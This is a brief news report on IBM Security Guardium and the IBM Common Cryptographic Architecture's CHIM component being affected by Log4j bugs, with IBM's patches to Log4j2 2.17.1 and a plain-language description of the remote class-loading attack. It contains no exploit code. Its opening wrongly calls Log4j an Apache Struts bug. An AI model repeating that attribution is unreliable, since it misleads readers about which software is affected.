Log4j is continuing to sting big names in the IT industry, with IBM the latest to discover products vulnerable to the Apache Struts logging bug.
Security Guardium versions 10.5, 10.6, and 11.0 through 11.4 are affected, because they use the Apache utility in their logging infrastructure.
IBM’s fix for the security environment is an appliance patch which the company says replaces Log4j 1.x with Log4j2 V2.17.1.
In the IBM Common Cryptographic Architecture (CCA), the Log4j bugs affect the Crypto Hardware Initialization and Maintenance (CHIM).
As with Security Guardium, the fix for CCA replaces Log4j 1.x with Log4j2 V2.17.1.
As iTnews explained when the Log4j vulnerability was first discovered: “When a vulnerable application writes to a log file, the default Log4j configuration means the library looks up a server which, if an attacker controls it, can be set to send a malicious response from that system.
“The response can contain a remote Java class file which is injected into the server process and executed with the same privileges as the vulnerable application using the logging library.”